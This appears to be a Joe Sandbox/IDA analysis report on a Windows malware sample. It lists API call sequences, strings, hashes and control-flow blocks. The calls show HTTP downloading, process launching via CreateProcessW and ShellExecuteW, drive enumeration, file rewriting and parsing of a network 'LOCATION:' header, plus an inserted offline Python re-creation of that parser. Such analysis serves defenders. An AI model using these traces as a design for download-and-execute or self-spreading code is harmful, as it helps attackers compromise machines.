                                                                                • Instruction Fuzzy Hash: 6671FC75A00608EFDF14DFA4D988BAFB7B4EB48300F14856AE506B6290D7799A40CF69

                                                                                Control-flow Graph

                                                                                APIs
                                                                                • EnterCriticalSection.KERNEL32(?,00000000,?,?,004021A5,00000000), ref: 0040161F
                                                                                • InterlockedDecrement.KERNEL32(?), ref: 0040164B
                                                                                • InterlockedExchangeAdd.KERNEL32(?,00000000), ref: 00401663
                                                                                • InterlockedIncrement.KERNEL32(?), ref: 00401691
                                                                                • InterlockedDecrement.KERNEL32(?), ref: 004016A1
                                                                                • LeaveCriticalSection.KERNEL32(?,?,?,004021A5,00000000), ref: 004016B9
                                                                                • SetEvent.KERNEL32(?,?,?,004021A5,00000000), ref: 004016C3
                                                                                • PostQueuedCompletionStatus.KERNEL32(?,00000000,00000000,00000000,?,?,004021A5,00000000), ref: 004016E0
                                                                                • CloseHandle.KERNEL32(?,?,?,004021A5,00000000), ref: 00401709
                                                                                • CloseHandle.KERNEL32(?,?,?,004021A5,00000000), ref: 0040170F
                                                                                • WSACloseEvent.WS2_32(?), ref: 00401715
                                                                                • DeleteCriticalSection.KERNEL32(?,?,?,?,004021A5,00000000), ref: 0040172B
                                                                                Strings
                                                                                Memory Dump Source
                                                                                • Source File: 00000005.00000002.1579577467.0000000000401000.00000020.00000001.01000000.00000007.sdmp, Offset: 00400000, based on PE: true
                                                                                • Associated: 00000005.00000002.1579557365.0000000000400000.00000002.00000001.01000000.00000007.sdmp
                                                                                • Associated: 00000005.00000002.1579593026.0000000000410000.00000002.00000001.01000000.00000007.sdmp
                                                                                • Associated: 00000005.00000002.1579607717.0000000000414000.00000008.00000001.01000000.00000007.sdmp
                                                                                Joe Sandbox IDA Plugin
                                                                                • Snapshot File: hcaresult_5_2_400000_3193211493.jbxd
                                                                                Yara matches
                                                                                Similarity
                                                                                • API ID: Interlocked$CloseCriticalSection$DecrementEventHandle$CompletionDeleteEnterExchangeIncrementLeavePostQueuedStatus
                                                                                • String ID: PCOI$ilci
                                                                                • API String ID: 2403999931-3762367603
                                                                                • Opcode ID: fdb9d9f1c1081d3bac4efd2c1ea591fdf2f72c624c4a3d2a847f061e6529de26
                                                                                • Instruction ID: 4aeae16d9e67a94d8ff1aa5cc2109be900ec35187bf01e7539301e61904878f7
                                                                                • Opcode Fuzzy Hash: fdb9d9f1c1081d3bac4efd2c1ea591fdf2f72c624c4a3d2a847f061e6529de26
                                                                                • Instruction Fuzzy Hash: FA319475900705ABC7209F70EC48B97B7A8BF08300F048A3AF559A3691C77AF894CB98

                                                                                Control-flow Graph

                                                                                APIs
                                                                                • memset.NTDLL ref: 00405838
                                                                                • GetModuleHandleW.KERNEL32(00000000), ref: 00405850
                                                                                • Sleep.KERNEL32(00000001), ref: 00405864
                                                                                • GetTickCount.KERNEL32 ref: 0040586A
                                                                                • GetTickCount.KERNEL32 ref: 00405873
                                                                                • wsprintfW.USER32 ref: 00405886
                                                                                • RegisterClassExW.USER32(00000030), ref: 00405893
                                                                                • CreateWindowExW.USER32(00000000,?,00000000,00000000,00000000,00000000,00000000,00000000,000000FD,00000000,?,00000000), ref: 004058BC
                                                                                • GetMessageA.USER32(?,00000000,00000000,00000000), ref: 004058D7
                                                                                • TranslateMessage.USER32(?), ref: 004058E5
                                                                                • DispatchMessageA.USER32(?), ref: 004058EF
                                                                                • ExitThread.KERNEL32 ref: 00405901
                                                                                Strings
                                                                                Memory Dump Source
                                                                                • Source File: 00000005.00000002.1579577467.0000000000401000.00000020.00000001.01000000.00000007.sdmp, Offset: 00400000, based on PE: true
                                                                                • Associated: 00000005.00000002.1579557365.0000000000400000.00000002.00000001.01000000.00000007.sdmp
                                                                                • Associated: 00000005.00000002.1579593026.0000000000410000.00000002.00000001.01000000.00000007.sdmp
                                                                                • Associated: 00000005.00000002.1579607717.0000000000414000.00000008.00000001.01000000.00000007.sdmp
                                                                                Joe Sandbox IDA Plugin
                                                                                • Snapshot File: hcaresult_5_2_400000_3193211493.jbxd
                                                                                Yara matches
                                                                                Similarity
                                                                                • API ID: Message$CountTick$ClassCreateDispatchExitHandleModuleRegisterSleepThreadTranslateWindowmemsetwsprintf
                                                                                • String ID: %x%X$0
                                                                                • API String ID: 716646876-225668902
                                                                                • Opcode ID: 0ae848275c23e009fdd4c42bfca4f986060bd914b3fa7c2793bcea76a610d9bf
                                                                                • Instruction ID: f3e1014eb48ffaf448ebc99f6ba60d6258e7c56012e586919e9efecad1237f6d
                                                                                • Opcode Fuzzy Hash: 0ae848275c23e009fdd4c42bfca4f986060bd914b3fa7c2793bcea76a610d9bf
                                                                                • Instruction Fuzzy Hash: BB211A71940308BBEB10ABA0DC49FEE7B78EB04711F108439F606BA1D0DBB995948F69

                                                                                Control-flow Graph

                                                                                APIs
                                                                                • memset.NTDLL ref: 0040E098
                                                                                • InternetCrackUrlA.WININET(0040DB49,00000000,10000000,0000003C), ref: 0040E0E8
                                                                                • InternetOpenA.WININET(00000000,00000001,00000000,00000000,00000000), ref: 0040E0F8
                                                                                • InternetConnectA.WININET(00000000,?,?,00000000,00000000,00000003,00000000,00000000), ref: 0040E131
                                                                                • HttpOpenRequestA.WININET(00000000,GET,?,00000000,00000000,00000000,00000000,00000000), ref: 0040E167
                                                                                • HttpSendRequestA.WININET(00000000,00000000,00000000,00000000,00000000), ref: 0040E18F
                                                                                • InternetReadFile.WININET(00000000,?,00000400,?), ref: 0040E1D8
                                                                                • memcpy.NTDLL(00000000,?,00000000), ref: 0040E22A
                                                                                • InternetCloseHandle.WININET(00000000), ref: 0040E267
                                                                                • InternetCloseHandle.WININET(00000000), ref: 0040E274
                                                                                • InternetCloseHandle.WININET(00000000), ref: 0040E281
                                                                                Strings
                                                                                Memory Dump Source
                                                                                • Source File: 00000005.00000002.1579577467.0000000000401000.00000020.00000001.01000000.00000007.sdmp, Offset: 00400000, based on PE: true
                                                                                • Associated: 00000005.00000002.1579557365.0000000000400000.00000002.00000001.01000000.00000007.sdmp
                                                                                • Associated: 00000005.00000002.1579593026.0000000000410000.00000002.00000001.01000000.00000007.sdmp
                                                                                • Associated: 00000005.00000002.1579607717.0000000000414000.00000008.00000001.01000000.00000007.sdmp
                                                                                Joe Sandbox IDA Plugin
                                                                                • Snapshot File: hcaresult_5_2_400000_3193211493.jbxd
                                                                                Yara matches
                                                                                Similarity
                                                                                • API ID: Internet$CloseHandle$HttpOpenRequest$ConnectCrackFileReadSendmemcpymemset
                                                                                • String ID: <$GET
                                                                                • API String ID: 1205665004-427699995
                                                                                • Opcode ID: b5606582fcf9fad391a6fa346b47e70fe2b71523f8a0056a0553dfb9fae7cb88
                                                                                • Instruction ID: 8a187a806069c9ef74607f7bf39df95f2c1829c28a5b92bcc4b0b83bf30a7a56
                                                                                • Opcode Fuzzy Hash: b5606582fcf9fad391a6fa346b47e70fe2b71523f8a0056a0553dfb9fae7cb88
                                                                                • Instruction Fuzzy Hash: 16512DB1941228ABDB36CB50CC55BE9B3BCAB48705F1444E9F60DAA2C0D7B96BC4CF54

                                                                                Control-flow Graph

                                                                                APIs
                                                                                • Sleep.KERNEL32(000003E8), ref: 00406B5E
                                                                                • GetModuleFileNameW.KERNEL32(00000000,0041A428,00000104), ref: 00406B70
                                                                                  • Part of subcall function 0040EC20: CreateFileW.KERNEL32(00406B80,80000000,00000001,00000000,00000003,00000000,00000000,00406B80), ref: 0040EC40
                                                                                  • Part of subcall function 0040EC20: GetFileSize.KERNEL32(000000FF,00000000), ref: 0040EC55
                                                                                  • Part of subcall function 0040EC20: CloseHandle.KERNEL32(000000FF), ref: 0040EC62
                                                                                • ExitThread.KERNEL32 ref: 00406CDA
                                                                                  • Part of subcall function 00406340: GetLogicalDrives.KERNEL32 ref: 00406346
                                                                                  • Part of subcall function 00406340: RegOpenKeyExW.ADVAPI32(80000002,Software\Microsoft\Windows\CurrentVersion\Policies\Explorer,00000000,00020019,?), ref: 00406394
                                                                                  • Part of subcall function 00406340: RegQueryValueExW.ADVAPI32(?,NoDrives,00000000,00000000,00000000,00000004), ref: 004063C1
                                                                                  • Part of subcall function 00406340: RegCloseKey.ADVAPI32(?), ref: 004063DE
                                                                                • Sleep.KERNEL32(000007D0), ref: 00406CCD
                                                                                  • Part of subcall function 00406260: lstrcpyW.KERNEL32(?,?), ref: 004062B3
                                                                                • GetVolumeInformationW.KERNEL32(?,?,00000105,00000000,00000000,?,00000000,00000000), ref: 00406C0F
                                                                                • GetDiskFreeSpaceExW.KERNEL32(?,00000000,?,00000000), ref: 00406C24
                                                                                • _aulldiv.NTDLL(?,?,40000000,00000000), ref: 00406C3F
                                                                                • wsprintfW.USER32 ref: 00406C52
                                                                                • wsprintfW.USER32 ref: 00406C72
                                                                                • wsprintfW.USER32 ref: 00406C95
                                                                                Strings
                                                                                Memory Dump Source
                                                                                • Source File: 00000005.00000002.1579577467.0000000000401000.00000020.00000001.01000000.00000007.sdmp, Offset: 00400000, based on PE: true
                                                                                • Associated: 00000005.00000002.1579557365.0000000000400000.00000002.00000001.01000000.00000007.sdmp
                                                                                • Associated: 00000005.00000002.1579593026.0000000000410000.00000002.00000001.01000000.00000007.sdmp
                                                                                • Associated: 00000005.00000002.1579607717.0000000000414000.00000008.00000001.01000000.00000007.sdmp
                                                                                Joe Sandbox IDA Plugin
                                                                                • Snapshot File: hcaresult_5_2_400000_3193211493.jbxd
                                                                                Yara matches
                                                                                Similarity
                                                                                • API ID: Filewsprintf$CloseSleep$CreateDiskDrivesExitFreeHandleInformationLogicalModuleNameOpenQuerySizeSpaceThreadValueVolume_aulldivlstrcpy
                                                                                • String ID: (%dGB)$%s%s$Unnamed volume
                                                                                • API String ID: 1650488544-2117135753
                                                                                • Opcode ID: 6d9c390415530bf0d7068dac02101ca91c021f24dc2fb290cfd9444ed22e654c
                                                                                • Instruction ID: 453264953970db4b87c24ab6cdbfc4a104d47f91dccd03b52bb95ce70ceb3e7a
                                                                                • Opcode Fuzzy Hash: 6d9c390415530bf0d7068dac02101ca91c021f24dc2fb290cfd9444ed22e654c
                                                                                • Instruction Fuzzy Hash: E041A9B1940218BBE714DB94DD55FEE7378BB48700F0081BAF20AB61D0DA785B94CF6A

                                                                                Control-flow Graph (basic blocks with the APIs they call and their successors; the executed / not-executed colouring of the rendered graph is not recoverable as text)

                                                                                • 749 40ec70-40ecaf: CreateFileW → 750, 751
                                                                                • 750 40ecb5-40ecd0: CreateFileMappingW → 752, 753
                                                                                • 751 40edca-40edce → 754, 755
                                                                                • 752 40edc0-40edc4: CloseHandle → 751
                                                                                • 753 40ecd6-40ecef: MapViewOfFile → 756, 757
                                                                                • 754 40edd0-40edf0: CreateFileW → 758, 759
                                                                                • 755 40ee24-40ee2a (no successors)
                                                                                • 756 40ecf5-40ed0b: GetFileSize → 760, 761
                                                                                • 757 40edb6-40edba: CloseHandle → 752
                                                                                • 758 40edf2-40ee12: WriteFile, CloseHandle → 759
                                                                                • 759 40ee18-40ee21: call 40a660 → 755
                                                                                • 760 40ed11-40ed24: call 40cca0 → 761, 766
                                                                                • 761 40edac-40edb0: UnmapViewOfFile → 757
                                                                                • 766 40ed2a-40ed39 → 761, 767
                                                                                • 767 40ed3b-40ed6a: call 40c640 → 761, 770
                                                                                • 770 40ed6c-40ed97: call 40a990, memcmp → 761, 773
                                                                                • 773 40ed99-40eda5: call 40a660 → 761
                                                                                APIs
                                                                                • CreateFileW.KERNEL32(00000000,80000000,00000000,00000000,00000003,00000000,00000000), ref: 0040ECA2
                                                                                • CreateFileMappingW.KERNEL32(000000FF,00000000,00000002,00000000,00000000,00000000), ref: 0040ECC3
                                                                                • MapViewOfFile.KERNEL32(00000000,00000004,00000000,00000000,00000000), ref: 0040ECE2
                                                                                • GetFileSize.KERNEL32(000000FF,00000000), ref: 0040ECFB
                                                                                • memcmp.NTDLL ref: 0040ED8D
                                                                                • UnmapViewOfFile.KERNEL32(00000000), ref: 0040EDB0
                                                                                • CloseHandle.KERNEL32(00000000), ref: 0040EDBA
                                                                                • CloseHandle.KERNEL32(000000FF), ref: 0040EDC4
                                                                                • CreateFileW.KERNEL32(00000000,40000000,00000000,00000000,00000002,00000000,00000000), ref: 0040EDE3
                                                                                • WriteFile.KERNEL32(000000FF,00000000,00000000,00000000,00000000), ref: 0040EE08
                                                                                • CloseHandle.KERNEL32(000000FF), ref: 0040EE12
                                                                                Memory Dump Source
                                                                                • Source File: 00000005.00000002.1579577467.0000000000401000.00000020.00000001.01000000.00000007.sdmp, Offset: 00400000, based on PE: true
                                                                                • Associated: 00000005.00000002.1579557365.0000000000400000.00000002.00000001.01000000.00000007.sdmp
                                                                                • Associated: 00000005.00000002.1579593026.0000000000410000.00000002.00000001.01000000.00000007.sdmp
                                                                                • Associated: 00000005.00000002.1579607717.0000000000414000.00000008.00000001.01000000.00000007.sdmp
                                                                                Joe Sandbox IDA Plugin
                                                                                • Snapshot File: hcaresult_5_2_400000_3193211493.jbxd
                                                                                Yara matches
                                                                                Similarity
                                                                                • API ID: File$CloseCreateHandle$View$MappingSizeUnmapWritememcmp
                                                                                • String ID:
                                                                                • API String ID: 3902698870-0
                                                                                • Opcode ID: 643dd6457151afb767136b96de088e300be71ca2aa9c529637807d59cb8df3e5
                                                                                • Instruction ID: 32b63ebe374edb734f10ceafdcfe6a9e739b08b32ae31a868bafe8a6799fa03f
                                                                                • Opcode Fuzzy Hash: 643dd6457151afb767136b96de088e300be71ca2aa9c529637807d59cb8df3e5
                                                                                • Instruction Fuzzy Hash: 20514EB4E40209FBDB14DFA4CC49BDEB774AB48704F108569E611B72C0D7B9AA40CB98
                                                                                APIs
                                                                                • GetCurrentThread.KERNEL32 ref: 0040D786
                                                                                • GetThreadPriority.KERNEL32(00000000,?,?,?,00407F75,?,000000FF), ref: 0040D78D
                                                                                • GetCurrentThread.KERNEL32 ref: 0040D798
                                                                                • SetThreadPriority.KERNEL32(00000000,?,?,?,00407F75,?,000000FF), ref: 0040D79F
                                                                                • InterlockedExchangeAdd.KERNEL32(00407F75,00000000), ref: 0040D7C2
                                                                                • EnterCriticalSection.KERNEL32(000000FB), ref: 0040D7F7
                                                                                • WaitForSingleObject.KERNEL32(000000FF,00000000), ref: 0040D842
                                                                                • LeaveCriticalSection.KERNEL32(000000FB), ref: 0040D85E
                                                                                • Sleep.KERNEL32(00000001), ref: 0040D88E
                                                                                • GetCurrentThread.KERNEL32 ref: 0040D89D
                                                                                • SetThreadPriority.KERNEL32(00000000,?,?,?,00407F75), ref: 0040D8A4
                                                                                Memory Dump Source
                                                                                • Source File: 00000005.00000002.1579577467.0000000000401000.00000020.00000001.01000000.00000007.sdmp, Offset: 00400000, based on PE: true
                                                                                • Associated: 00000005.00000002.1579557365.0000000000400000.00000002.00000001.01000000.00000007.sdmp
                                                                                • Associated: 00000005.00000002.1579593026.0000000000410000.00000002.00000001.01000000.00000007.sdmp
                                                                                • Associated: 00000005.00000002.1579607717.0000000000414000.00000008.00000001.01000000.00000007.sdmp
                                                                                Joe Sandbox IDA Plugin
                                                                                • Snapshot File: hcaresult_5_2_400000_3193211493.jbxd
                                                                                Yara matches
                                                                                Similarity
                                                                                • API ID: Thread$CurrentPriority$CriticalSection$EnterExchangeInterlockedLeaveObjectSingleSleepWait
                                                                                • String ID:
                                                                                • API String ID: 3862671961-0
                                                                                • Opcode ID: a6592383c0f5364e70b0f454a5c96517dd5f3d581be9e9b029ccc77ff023b2d7
                                                                                • Instruction ID: 6fb5641eb3e61aabfeb8d94b6f23565c140e371fca94fd76c4ad34d85bd1d77f
                                                                                • Opcode Fuzzy Hash: a6592383c0f5364e70b0f454a5c96517dd5f3d581be9e9b029ccc77ff023b2d7
                                                                                • Instruction Fuzzy Hash: 32414C75E00209EBCB04EFE4D848BAEBB71EF44305F10C16AE916A7384D6789A85CF55
                                                                                APIs
                                                                                • memset.NTDLL ref: 0040EE3E
                                                                                • memset.NTDLL ref: 0040EE4E
                                                                                • CreateProcessW.KERNEL32(00000000,00407896,00000000,00000000,00000000,00000020,00000000,00000000,00000044,?), ref: 0040EE87
                                                                                • Sleep.KERNEL32(000003E8), ref: 0040EE97
                                                                                • ShellExecuteW.SHELL32(00000000,open,00407896,00000000,00000000,00000000), ref: 0040EEB2
                                                                                • Sleep.KERNEL32(000003E8), ref: 0040EECC
                                                                                Strings
                                                                                Memory Dump Source
                                                                                • Source File: 00000005.00000002.1579577467.0000000000401000.00000020.00000001.01000000.00000007.sdmp, Offset: 00400000, based on PE: true
                                                                                • Associated: 00000005.00000002.1579557365.0000000000400000.00000002.00000001.01000000.00000007.sdmp
                                                                                • Associated: 00000005.00000002.1579593026.0000000000410000.00000002.00000001.01000000.00000007.sdmp
                                                                                • Associated: 00000005.00000002.1579607717.0000000000414000.00000008.00000001.01000000.00000007.sdmp
                                                                                Joe Sandbox IDA Plugin
                                                                                • Snapshot File: hcaresult_5_2_400000_3193211493.jbxd
                                                                                Yara matches
                                                                                Similarity
                                                                                • API ID: Sleepmemset$CreateExecuteProcessShell
                                                                                • String ID: $D$open
                                                                                • API String ID: 3787208655-2182757814
                                                                                • Opcode ID: aaa8efd2447e76ebee4be6377d3fcdc8a7337733f8d70036db534e1e8db572fc
                                                                                • Instruction ID: ab95b539b52ee8c861e7b35bb7843e11e17158efae48c82db73052011d4181fd
                                                                                • Opcode Fuzzy Hash: aaa8efd2447e76ebee4be6377d3fcdc8a7337733f8d70036db534e1e8db572fc
                                                                                • Instruction Fuzzy Hash: F2113071A4430CBAEB10DB90DD46FDE7764AB14B00F104125FA057E2C0D6F5AA548759
                                                                                APIs
                                                                                • InterlockedExchange.KERNEL32(?,00000000), ref: 00401D86
                                                                                • InterlockedDecrement.KERNEL32(?), ref: 00401DB0
                                                                                • InterlockedDecrement.KERNEL32(?), ref: 00401DC3
                                                                                • InterlockedExchangeAdd.KERNEL32(?,?), ref: 00401DD4
                                                                                • InterlockedDecrement.KERNEL32(?), ref: 00401E5B
                                                                                • InterlockedDecrement.KERNEL32(?), ref: 00401EF6
                                                                                • setsockopt.WS2_32 ref: 00401F2C
                                                                                • closesocket.WS2_32(?), ref: 00401F39
                                                                                  • Part of subcall function 0040D950: NtQuerySystemTime.NTDLL(0040B865), ref: 0040D95A
                                                                                  • Part of subcall function 0040D950: RtlTimeToSecondsSince1980.NTDLL ref: 0040D968
                                                                                Memory Dump Source
                                                                                • Source File: 00000005.00000002.1579577467.0000000000401000.00000020.00000001.01000000.00000007.sdmp, Offset: 00400000, based on PE: true
                                                                                • Associated: 00000005.00000002.1579557365.0000000000400000.00000002.00000001.01000000.00000007.sdmp
                                                                                • Associated: 00000005.00000002.1579593026.0000000000410000.00000002.00000001.01000000.00000007.sdmp
                                                                                • Associated: 00000005.00000002.1579607717.0000000000414000.00000008.00000001.01000000.00000007.sdmp
                                                                                Joe Sandbox IDA Plugin
                                                                                • Snapshot File: hcaresult_5_2_400000_3193211493.jbxd
                                                                                Yara matches
                                                                                Similarity
                                                                                • API ID: Interlocked$Decrement$ExchangeTime$QuerySecondsSince1980Systemclosesocketsetsockopt
                                                                                • String ID:
                                                                                • API String ID: 671207744-0
                                                                                • Opcode ID: ae0f208c7e5ebe03a9eed9973f4c7fb273d4e64238f42e24874dbd14c375a4e9
                                                                                • Instruction ID: 68686fb6eff55c499ad5be399ae1fa7ea08460e57826cc3027d59358e60976cc
                                                                                • Opcode Fuzzy Hash: ae0f208c7e5ebe03a9eed9973f4c7fb273d4e64238f42e24874dbd14c375a4e9
                                                                                • Instruction Fuzzy Hash: 34519E75608B02ABC704DF39D488B9BFBE4BF88314F44872EF89983360D775A5458B96
                                                                                APIs
                                                                                • recvfrom.WS2_32(000000FF,?,00000400,00000000,00000000,00000000), ref: 0040DD8E
                                                                                • Sleep.KERNEL32(000003E8), ref: 0040DD9E
                                                                                • StrCmpNIA.SHLWAPI(?,HTTP/1.1 200 OK,0000000F), ref: 0040DDBB
                                                                                • StrStrIA.SHLWAPI(?,LOCATION: ), ref: 0040DDD1
                                                                                • StrChrA.SHLWAPI(?,0000000D), ref: 0040DDFE
                                                                                Strings
                                                                                Memory Dump Source
                                                                                • Source File: 00000005.00000002.1579577467.0000000000401000.00000020.00000001.01000000.00000007.sdmp, Offset: 00400000, based on PE: true
                                                                                • Associated: 00000005.00000002.1579557365.0000000000400000.00000002.00000001.01000000.00000007.sdmp
                                                                                • Associated: 00000005.00000002.1579593026.0000000000410000.00000002.00000001.01000000.00000007.sdmp
                                                                                • Associated: 00000005.00000002.1579607717.0000000000414000.00000008.00000001.01000000.00000007.sdmp
                                                                                Joe Sandbox IDA Plugin
                                                                                • Snapshot File: hcaresult_5_2_400000_3193211493.jbxd
                                                                                Yara matches
                                                                                Similarity
                                                                                • API ID: Sleeprecvfrom
                                                                                • String ID: HTTP/1.1 200 OK$LOCATION:
                                                                                • API String ID: 668330359-3973262388
                                                                                • Opcode ID: eefe196d39f416e400a4d4ef2e05462a5a71bb0c03a382919cece79f19d7d758
                                                                                • Instruction ID: 7b96b2f8d6d36e055c6c7570a615b3eea8bd5cb55d36e980e60cabbeadb8daeb
                                                                                • Opcode Fuzzy Hash: eefe196d39f416e400a4d4ef2e05462a5a71bb0c03a382919cece79f19d7d758
                                                                                • Instruction Fuzzy Hash: 78216FB5940218ABDB20DB64DC49BE97774AF04308F1085E9E709BB2D0D6B95AC6CF9C
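The function above reads a single recvfrom() buffer of 0x400 bytes, compares its first 0x0F (15) bytes case-insensitively against "HTTP/1.1 200 OK", searches it case-insensitively for "LOCATION: " and then looks for a carriage return (0x0D) from that point. The Python below re-creates that behaviour so its edge cases can be exercised offline. It is an added example for this page, not code from the sample or from Joe Sandbox; the reading that the CR search delimits a Location header value is an assumption drawn from the listed arguments, and the three responses are constructed test inputs, not captured traffic.

```python
"""Re-creation of the raw HTTP response probe implied by the recvfrom / StrCmpNIA /
StrStrIA / StrChrA sequence.  Added example; the header-extraction interpretation
is an assumption based on the listed API arguments."""

RECV_LEN = 0x400                    # third argument of recvfrom in the listing
STATUS_PREFIX = "HTTP/1.1 200 OK"   # StrCmpNIA compares 0x0F = 15 characters
LOCATION_TAG = "LOCATION: "         # StrStrIA is case-insensitive, so "Location: " also matches


def probe_response(raw: bytes) -> dict:
    """Mirror the listed calls on one receive buffer.

    - only the first 0x400 bytes are ever examined (one recvfrom call);
    - the status check is a case-insensitive 15-byte prefix compare;
    - the Location value runs from the tag to the first CR; if no CR falls inside the
      buffer (StrChrA would return NULL) the value is reported as absent.
    """
    buf = raw[:RECV_LEN].decode("latin-1")
    status_ok = buf[:len(STATUS_PREFIX)].lower() == STATUS_PREFIX.lower()
    location = None
    idx = buf.lower().find(LOCATION_TAG.lower())
    if idx >= 0:
        start = idx + len(LOCATION_TAG)
        end = buf.find("\r", start)
        if end >= 0:
            location = buf[start:end]
    return {"status_ok": status_ok, "location": location, "truncated": len(raw) > RECV_LEN}


# Constructed responses (not captured traffic); example.invalid is a reserved name.
REDIRECT = (b"HTTP/1.1 302 Found\r\nLocation: http://example.invalid/next\r\n"
            b"Content-Length: 0\r\n\r\n")
OK_RESPONSE = b"HTTP/1.1 200 OK\r\nContent-Type: text/plain\r\n\r\nhello"
# Header block padded so that Location starts beyond the first 0x400 bytes:
# a single recvfrom never sees it, and the probe reports no Location at all.
PADDED = (b"HTTP/1.1 302 Found\r\nX-Pad: " + b"a" * RECV_LEN +
          b"\r\nLocation: http://example.invalid/\r\n\r\n")

if __name__ == "__main__":
    for name, resp in (("redirect", REDIRECT), ("ok", OK_RESPONSE), ("padded", PADDED)):
        print(name, probe_response(resp))
```

Two properties fall out of the re-creation: a lower-case or HTTP/1.0 status line fails the 15-byte compare even when the server did return 200, and any header that pushes the Location line past the 1024-byte window makes the probe miss it entirely.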
                                                                                APIs
                                                                                • InternetOpenA.WININET(Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/124.0.0.0 Safari/537.36,00000001,00000000,00000000,00000000), ref: 0040EEF7
                                                                                • InternetOpenUrlA.WININET(00000000,?,00000000,00000000,00000000,00000000), ref: 0040EF16
                                                                                • HttpQueryInfoA.WININET(00000000,20000005,?,00000004,00000000), ref: 0040EF3F
                                                                                • InternetCloseHandle.WININET(00000000), ref: 0040EF68
                                                                                • InternetCloseHandle.WININET(00000000), ref: 0040EF72
                                                                                • Sleep.KERNEL32(000003E8), ref: 0040EF7D
                                                                                Strings
                                                                                • Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/124.0.0.0 Safari/537.36, xrefs: 0040EEF2
                                                                                Memory Dump Source
                                                                                • Source File: 00000005.00000002.1579577467.0000000000401000.00000020.00000001.01000000.00000007.sdmp, Offset: 00400000, based on PE: true
                                                                                • Associated: 00000005.00000002.1579557365.0000000000400000.00000002.00000001.01000000.00000007.sdmp
                                                                                • Associated: 00000005.00000002.1579593026.0000000000410000.00000002.00000001.01000000.00000007.sdmp
                                                                                • Associated: 00000005.00000002.1579607717.0000000000414000.00000008.00000001.01000000.00000007.sdmp
                                                                                Joe Sandbox IDA Plugin
                                                                                • Snapshot File: hcaresult_5_2_400000_3193211493.jbxd
                                                                                Yara matches
                                                                                Similarity
                                                                                • API ID: Internet$CloseHandleOpen$HttpInfoQuerySleep
                                                                                • String ID: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/124.0.0.0 Safari/537.36
                                                                                • API String ID: 2743515581-2272513262
                                                                                • Opcode ID: be2b98b0d1d94f3769b5301c8c7766c76a7eb5c2fd3991898107c864a0abb6dc
                                                                                • Instruction ID: 09246262baac8142bf73057cdf9805b9640511cbdee0a0d8a20d2e1b7007a2ac
                                                                                • Opcode Fuzzy Hash: be2b98b0d1d94f3769b5301c8c7766c76a7eb5c2fd3991898107c864a0abb6dc
                                                                                • Instruction Fuzzy Hash: 6A210A75A40309FBDB10DFA4CC49FEEB775AB08705F1085A9FA11AB2C0C7B96A44CB59
                                                                                APIs
                                                                                • InitializeCriticalSection.KERNEL32(0041AE68,?,?,?,?,?,?,00407EF9), ref: 0040B77B
                                                                                • CreateFileW.KERNEL32(0041AC50,80000000,00000000,00000000,00000003,00000000,00000000), ref: 0040B7CD
                                                                                • CreateFileMappingW.KERNEL32(000000FF,00000000,00000002,00000000,00000000,00000000), ref: 0040B7EE
                                                                                • MapViewOfFile.KERNEL32(00000000,00000004,00000000,00000000,00000000), ref: 0040B80D
                                                                                • GetFileSize.KERNEL32(000000FF,00000000), ref: 0040B822
                                                                                • UnmapViewOfFile.KERNEL32(00000000), ref: 0040B888
                                                                                • CloseHandle.KERNEL32(00000000), ref: 0040B892
                                                                                • CloseHandle.KERNEL32(000000FF), ref: 0040B89C
                                                                                  • Part of subcall function 0040D950: NtQuerySystemTime.NTDLL(0040B865), ref: 0040D95A
                                                                                  • Part of subcall function 0040D950: RtlTimeToSecondsSince1980.NTDLL ref: 0040D968
                                                                                Memory Dump Source
                                                                                • Source File: 00000005.00000002.1579577467.0000000000401000.00000020.00000001.01000000.00000007.sdmp, Offset: 00400000, based on PE: true
                                                                                 • Associated: 00000005.00000002.1579557365.0000000000400000.00000002.00000001.01000000.00000007.sdmp
                                                                                 • Associated: 00000005.00000002.1579593026.0000000000410000.00000002.00000001.01000000.00000007.sdmp
                                                                                 • Associated: 00000005.00000002.1579607717.0000000000414000.00000008.00000001.01000000.00000007.sdmp
                                                                                Joe Sandbox IDA Plugin
                                                                                • Snapshot File: hcaresult_5_2_400000_3193211493.jbxd
                                                                                Yara matches
                                                                                Similarity
                                                                                • API ID: File$CloseCreateHandleTimeView$CriticalInitializeMappingQuerySecondsSectionSince1980SizeSystemUnmap
                                                                                • String ID:
                                                                                • API String ID: 439099756-0
                                                                                • Opcode ID: c6295368b3329a36b4d5b539f0c7913c2e24e4bff1a22c952df061e282144c4a
                                                                                • Instruction ID: 479a2d3db74d12cc9ab5db8b9028aebaa0e2ca82416c5c7c2c0831f1d1863687
                                                                                • Opcode Fuzzy Hash: c6295368b3329a36b4d5b539f0c7913c2e24e4bff1a22c952df061e282144c4a
                                                                                • Instruction Fuzzy Hash: FB417C75E40309ABDB10EFA4CC4ABAEB774EB44704F20842AFA11B72D1C7B96541CB9D
                                                                                APIs
                                                                                • InitializeCriticalSection.KERNEL32(0041A400,?,?,?,?,?,00407EC3), ref: 00405B6B
                                                                                • CreateFileW.KERNEL32(0041A630,80000000,00000000,00000000,00000003,00000000,00000000,?,?,?,?,?,00407EC3), ref: 00405B85
                                                                                • CreateFileMappingW.KERNEL32(000000FF,00000000,00000002,00000000,00000000,00000000), ref: 00405BA6
                                                                                • MapViewOfFile.KERNEL32(00000000,00000004,00000000,00000000,00000000), ref: 00405BC5
                                                                                • GetFileSize.KERNEL32(000000FF,00000000), ref: 00405BDE
                                                                                • UnmapViewOfFile.KERNEL32(00000000), ref: 00405C6B
                                                                                • CloseHandle.KERNEL32(00000000), ref: 00405C75
                                                                                • CloseHandle.KERNEL32(000000FF), ref: 00405C7F
                                                                                Memory Dump Source
                                                                                • Source File: 00000005.00000002.1579577467.0000000000401000.00000020.00000001.01000000.00000007.sdmp, Offset: 00400000, based on PE: true
                                                                                 • Associated: 00000005.00000002.1579557365.0000000000400000.00000002.00000001.01000000.00000007.sdmp
                                                                                 • Associated: 00000005.00000002.1579593026.0000000000410000.00000002.00000001.01000000.00000007.sdmp
                                                                                 • Associated: 00000005.00000002.1579607717.0000000000414000.00000008.00000001.01000000.00000007.sdmp
                                                                                Joe Sandbox IDA Plugin
                                                                                • Snapshot File: hcaresult_5_2_400000_3193211493.jbxd
                                                                                Yara matches
                                                                                Similarity
                                                                                • API ID: File$CloseCreateHandleView$CriticalInitializeMappingSectionSizeUnmap
